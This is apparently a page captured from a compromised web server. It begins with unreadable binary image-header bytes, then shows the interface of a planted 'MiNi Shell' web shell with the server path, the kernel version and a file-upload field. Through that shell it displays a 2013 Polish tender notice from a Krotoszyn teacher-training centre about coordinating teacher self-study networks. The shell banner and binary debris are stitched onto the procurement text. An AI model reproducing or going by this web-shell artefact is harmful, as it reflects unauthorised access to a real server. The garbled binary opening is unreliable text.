JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/208395-N-2013.html

<p class="kh_header"><b>Krotoszyn: Pełnienie funkcji koordynatora sieci współpracy i samokształcenia projektu                   Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół   i przedszkoli w powiecie krotoszyńskim.</b><br>
<b>Numer ogłoszenia: 208395 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowy Ośrodek Doskonalenia Nauczycieli , Plac Szkolny 19, 63-700 Krotoszyn, woj. wielkopolskie, tel. 62 725 26 78, faks 62 725 26 78.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Oświata.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatora sieci współpracy i samokształcenia projektu                   Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół   i przedszkoli w powiecie krotoszyńskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest pełnienie funkcji koordynatora sieci współpracy                          i samokształcenia projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowe wsparcie rozwoju szkół i przedszkoli w powiecie krotoszyńskim.
Koordynator sieci pracuje na rzecz szkół/przedszkoli. Planowane jest utworzenie 5 sieci współpracy                         i samokształcenia, których założenia wypracowane zostały w ramach projektu systemowego ORE, 2 sieci                    dla dyrektorów przeszkoli i szkół oraz 3 sieci dla nauczycieli przedszkoli i szkół, które będą działać w roku szkolnym 2013/2014 i 2014/2015.
2.WARUNKI REALIZACJI PRZEDMIOTU ZAMÓWIENIA:

1.Miejsce realizacji: placówki oświatowe w powiecie krotoszyńskim
2.Odbiorcy: dyrektorzy i nauczyciele szkół i przedszkoli Powiatu Krotoszyńskiego zgłoszonych do projektu.
3.Liczebność grup:
a) sieć współpracy i samokształcenia dyrektorów szkół i przedszkoli: 16-22 osób,
b) sieć współpracy i samokształcenia dyrektorów szkół i przedszkoli: 16-22 osób,
c) sieć współpracy i samokształcenia nauczycieli szkół i przedszkoli: 20-25 osób,
d) sieć współpracy i samokształcenia nauczycieli szkół i przedszkoli: 20-25 osób,
e) sieć współpracy i samokształcenia nauczycieli szkół i przedszkoli: 20-25 osób.

4.Terminy działania sieci współpracy i samokształcenia dyrektorów szkół i przedszkoli oraz nauczycieli szkół i przedszkoli Powiatu Krotoszyńskiego:
a) sieci współpracy i samokształcenia dyrektorów szkół i przedszkoli Powiatu Krotoszyńskiego; 2 sieci działają w roku szkolnym 2013/2014 oraz 2 sieci działają w roku szkolnym 2014/2015
b) sieci współpracy i samokształcenia nauczycieli szkół i przedszkoli Powiatu Krotoszyńskiego; 3 sieci działają w roku szkolnym 2013/2014 oraz 3 sieci działają w roku szkolnym 2014/2015.
Pięć sieci będzie działać od dnia podpisania umowy, tj. przez 23 miesiące, nie wcześniej niż od miesiąca października 2013 r. do 31 sierpnia 2015 r.

5.Etapy realizacji zamówienia:
a)koordynator przygotowuje plan dziania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników danej sieci,
b)organizuje 4 spotkania uczestników sieci,
c)sporządza roczne sprawozdanie z pracy sieci i przedstawia go uczestnikom,
d)moderuje pracę sieci na platformie internetowej ORE.




6.Koordynatorzy prowadzący sieci:

Koordynatorzy sieci muszą spełniać nw. wymagania:
a)	posiadać wykształcenie wyższe II stopnia z przygotowaniem pedagogicznym,
b)	posiadać stopień awansu zawodowego nauczyciela mianowanego,
c)	posiadać doświadczenie w pracy z grupą osób dorosłych, prowadzenie różnych form pracy               z grupami osób dorosłych, w tym działań realizowanych w szkołach i skierowanych do nauczycieli
(np. przygotowanie i prowadzenie lekcji otwartych, szkolenia rad pedagogicznych,        nauczycielskich grup przedmiotowych, doradztwo) doświadczenie w moderowaniu kursów                     i szkoleń prowadzonych również z wykorzystaniem metod elearningu,
d)	posiadać minimum 10letnie doświadczenie w pracy nauczyciela/ pedagoga/ psychologa, wiedzę merytoryczną z zakresu tematyki Organizowanie sieci współpracy i samokształcenia, udział w projektach systemowych np. w zakresie specjalnych potrzeb edukacyjnych, wdrażania podstawy programowej, realizacji projektu edukacyjnego,
e)	posiadać przygotowanie do pracy moderatora (np. ukończone kursy lub studia przygotowujące do pracy trenera, edukatora, moderatora, coacha, certyfikat trenerski, edukatorski, przeprowadzone szkolenia dla nauczycieli).

7.Zasady ogólne współpracy:
a)Wszystkie materiały powstające w ramach realizacji Zadania wymagają akceptacji Zamawiającego.                               b)Materiały przekazane Zamawiającemu przez Wykonawcę do akceptacji, Zamawiający zaakceptuje                         lub zwróci Wykonawcy z uwagami w ciągu 5 dni roboczych od ich otrzymania.                                                                       c)W przypadku zgłoszenia uwag, Wykonawca zobowiązuje się do ich uwzględnienia i przekazania poprawionej wersji w terminie 3 dni roboczych. Po tej procedurze, ponowne przekazanie przez Wykonawcę propozycji niepoprawionej lub niezgodnej z uwagami Zamawiającego zostanie uznane jako niewykonanie danego elementu Zadania.              
8.Zasady wizualizacji.  
Wykonawcy zobowiązani są do stosowania zasad wizualizacji określonych w Rozporządzeniu Komisji (WE) nr 1828/2006 z 8 grudnia 2006r. oraz wytycznych w zakresie informacji i promocji określonych przez Ministra Rozwoju Regionalnego a także w Strategii Komunikacji Funduszy Europejskich na lata 2007 2013 oraz Wytycznych Ministra Rozwoju Regionalnego z dnia 13 sierpnia 2007 r. w zakresie informacji i promocji, wydanego na podstawie ustawy z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (Dz. U. 2006 r., nr 227, poz. 1658, z późn. zm.). Szczegółowe omówienie zasad informowania o POKL zostało zawarte w Planie Komunikacji Programu Operacyjnego Kapitał Ludzki 20072013.                                                           9.Wykonawca zobowiązany jest  do wykonywania zamówienia w sposób zgodny z: opisem przedmiotu zamówienia, zawartą umową, obowiązującymi przepisami prawa, w szczególności z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych, oraz wszelkimi aktualnymi wytycznymi i zasadami dotyczącymi realizacji projektu, w szczególności z: wytycznymi wynikającymi z dokumentów: Wytyczne w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki oraz zasadami wynikającymi          z dokumentu Zasady finansowania Programu Operacyjnego Kapitał Ludzki, a także obowiązującą ustawą Prawo zamówień publicznych. 10.Wykonawca zobowiązuje się ponadto do:                                                                                                       a)udostępnienia Zamawiającemu oraz instytucjom uprawnionym do kontroli Zamawiającego, wglądu do wszystkich dokumentów, związanych z realizacją przedmiotowego zamówienia, w tym dokumentów finansowych,                                                                                                                                         b)przechowywania i archiwizowania dokumentacji związanej z realizacją przedmiotowego zamówienia zgodnie z zasadami Programu Operacyjnego Kapitał Ludzki tj. do dnia 31.12.2020 r. w sposób zapewniający ich dostępność, poufność i bezpieczeństwo oraz do informowania Instytucji Wdrażającej (Instytucji Pośredniczącej II stopnia) o miejscu ich archiwizacji,                                                                                          c)zachowania w poufności zarówno w trakcie trwania umowy jak i po jej ustaniu wszelkich danych                osobowych, do których wykonawca miał dostęp, zgodnie z ustawą z dnia  29 sierpnia 1997 r.  o ochronie danych osobowych  oraz przepisów wykonawczych wydanych na jej podstawie 11.Zamawiający zastrzega sobie prawo nadzoru i kontroli nad realizacją usługi oraz pozostałych zobowiązań wynikających z umowy.            Na żądanie Zamawiającego Wykonawcy zobowiązani są wykazać, iż realizują niniejsze zamówienie zgodnie             z umową, ofertą oraz SIWZ, a w szczególności przedstawić dokumentację pozwalającą na jednoznaczne stwierdzenie prawidłowości realizowanego zamówienia w zgodzie z powyższym





Zadanie 1
Koordynator sieci współpracy i samokształcenia dla dyrektorów w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim, powstaną 2 sieci dla dyrektorów szkól i przedszkoli.
1.Szacunkowa ilość godzin dla koordynatora sieci współpracy i samokształcenia: 30 godzin miesięcznie.
2.W ramach sieci współpracować ze sobą będzie około 20 dyrektorów z różnych szkół i przedszkoli, tj, w sumie  ok. 40 dyrektorów. Członkowie sieci będą spotykać się nie mniej niż 4 razy w trakcie pracy jednej sieci. Między spotkaniami dyrektorzy będą pracować na platformie internetowej udostępnionej przez ORE.
3.Obowiązki koordynatora sieci współpracy i samokształcenia:
1)	przygotowanie planu dziania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników,
2)	organizacja spotkań (przygotowanie i prowadzenie, zapraszanie metodyków, ekspertów z określonych dziedzin),
3)	moderowanie forum dyskusyjnego na platformie cyfrowej,
4)	zamieszczanie na platformie cyfrowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci,
5)	sporządzenie rocznego sprawozdania z pracy sieci i przedstawienie go uczestnikom,
6)	promocja działań sieci,
7)	monitorowanie frekwencji na zajęciach,
8)	współpraca ze specjalistami/ekspertami prowadzącymi zajęcia;
9)	prowadzenie nadzoru nad prawidłowym przebiegiem zajęć
10)	prowadzenie list obecności uczestników projektu.
4.Osoba pełniąca obowiązki koordynatora sieci współpracy i samokształcenia musi posiadać pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych oraz być dyspozycyjna w okresie realizacji projektu.

Zadanie 2
Koordynator sieci współpracy i samokształcenia dla nauczycieli w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim,
powstaną 3 sieci dla nauczycieli szkól i przedszkoli.

1.Szacunkowa ilość godzin dla koordynatora sieci współpracy i samokształcenia: 30 godzin miesięcznie.

2.W ramach sieci współpracować ze sobą będzie około 20 25 nauczycieli z różnych szkół i przedszkoli,                 tj, w sumie ok. 150 nauczycieli. Członkowie sieci będą spotykać się nie mniej niż 4 razy w trakcie pracy jednej sieci. Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez ORE.
3.Obowiązki koordynatora sieci współpracy i samokształcenia:
1.	przygotowanie planu dziania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników,
2.	organizacja spotkań (przygotowanie i prowadzenie, zapraszanie metodyków, ekspertów z określonych dziedzin),
3.	moderowanie forum dyskusyjnego na platformie cyfrowej,
4.	zamieszczanie na platformie cyfrowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci,
5.	sporządzenie rocznego sprawozdania z pracy sieci i przedstawienie go uczestnikom,
6.	promocja działań sieci,
7.	monitorowanie frekwencji na zajęciach,
8.	współpraca ze specjalistami/ekspertami prowadzącymi zajęcia;
9.	prowadzenie nadzoru nad prawidłowym przebiegiem zajęć
10.	prowadzenie list obecności uczestników projektu.

4.Osoba pełniąca obowiązki koordynatora sieci współpracy i samokształcenia musi posiadać pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych oraz być dyspozycyjna w okresie realizacji projektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na  zasadzie spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy,W przypadku osób fizycznych nie prowadzących działalności gospodarczej, zamiast dokumentów - aktualnego odpisu z właściwego rejestru lub centralnej ewidencji i informacji  o działalności gospodarczej (o których mowa powyżej) - Wykonawca  winien złożyć oświadczenie                                   o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	Zamawiający przewiduje możliwość zmiany sposobu spełnienia świadczenia w następujący sposób:    Dopuszcza się zmianę osoby,  dodanie kolejnych osób do realizacji zamówienia  przez Wykonawcę. W takim przypadku, Wykonawca do realizacji przedmiotu zamówienia zapewnia  osoby posiadające    kwalifikacje i doświadczenie nie mniejsze niż określone w warunkach udziału   w postępowaniu,
b)	Zmiana miejsca świadczenia usługi w przypadku, gdy Zamawiający nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość zapewnienia innego miejsca świadczenia usługi, w podobnych standardach.
2.Umowa może ulec zmianie również w przypadku  zmiany terminu realizacji umowy  z uwagi na działanie siły wyższej.
3.Dla potrzeb Umowy siła wyższa oznacza zdarzenie pozostające poza kontrolą Wykonawcy, występujące po podpisaniu Umowy przez obie Strony, przeszkadzające racjonalnemu wykonaniu przez Wykonawcę obowiązków, nie obejmujące winy własnej lub nienależytej staranności Wykonawcy lub osób, którymi się posłużył przy wykonywaniu umowy i nieprzewidywalne w dacie zawarcia niniejszej Umowy ani też niemożliwe do zapobieżenia.
4.Jeżeli siła wyższa spowoduje niewykonanie lub nienależyte wykonanie zobowiązań wynikających z Umowy:
a)	Wykonawca , który nie wykonał lub nienależycie wykonał swoje zobowiązania ze względu na działanie siły wyższej, zawiadomi w terminie 2 dni, na piśmie Zamawiającego o powstaniu i przewidywanym zakończeniu tego zdarzenia, przedstawiając stosowną dokumentację uzasadniającą w tym zakresie;
b)	Jeżeli Zamawiający  uzna argumentację  Wykonawcy, o której mowa w ust. 3 a,  za uzasadnioną sporządzi stosowny aneks do umowy.
5.	Strona przystąpi do dalszego wykonywania Umowy niezwłocznie po zakończeniu działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sodn.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.sodn.krotoszyn.pl
lub
Samorządowy Ośrodek Doskonalenia Nauczycieli w Krotoszynie, Plac Szkolny 19,63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2013 godzina 09:00, miejsce: Samorządowy Ośrodek Doskonalenia Nauczycieli w Krotoszynie, Plac Szkolny 19,63-700 Krotoszyn; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wdrożenie modelu doskonalenia nauczycieli                     i kompleksowe wsparcie rozwoju szkół i przedszkoli w powiecie krotoszyńskim (nr WND-POKL.03.05.00 00 157/12) realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet: III. Wysoka jakość systemu edukacji, Działanie: 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator sieci współpracy i samokształcenia dla dyrektorów w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim, powstaną 2 sieci dla dyrektorów szkól i przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koordynator sieci współpracy i samokształcenia dla dyrektorów w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim, powstaną 2 sieci dla dyrektorów szkól i przedszkoli.
1.Szacunkowa ilość godzin dla koordynatora sieci współpracy i samokształcenia: 30 godzin miesięcznie.
2.W ramach sieci współpracować ze sobą będzie około 20 dyrektorów z różnych szkół i przedszkoli, tj, w sumie  ok. 40 dyrektorów. Członkowie sieci będą spotykać się nie mniej niż 4 razy w trakcie pracy jednej sieci. Między spotkaniami dyrektorzy będą pracować na platformie internetowej udostępnionej przez ORE.
3.Obowiązki koordynatora sieci współpracy i samokształcenia:
1)	przygotowanie planu dziania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników,
2)	organizacja spotkań (przygotowanie i prowadzenie, zapraszanie metodyków, ekspertów z określonych dziedzin),
3)	moderowanie forum dyskusyjnego na platformie cyfrowej,
4)	zamieszczanie na platformie cyfrowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci,
5)	sporządzenie rocznego sprawozdania z pracy sieci i przedstawienie go uczestnikom,
6)	promocja działań sieci,
7)	monitorowanie frekwencji na zajęciach,
8)	współpraca ze specjalistami/ekspertami prowadzącymi zajęcia;
9)	prowadzenie nadzoru nad prawidłowym przebiegiem zajęć
10)	prowadzenie list obecności uczestników projektu.
4.Osoba pełniąca obowiązki koordynatora sieci współpracy i samokształcenia musi posiadać pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych oraz być dyspozycyjna w okresie realizacji projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynator sieci współpracy i samokształcenia dla nauczycieli w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim,
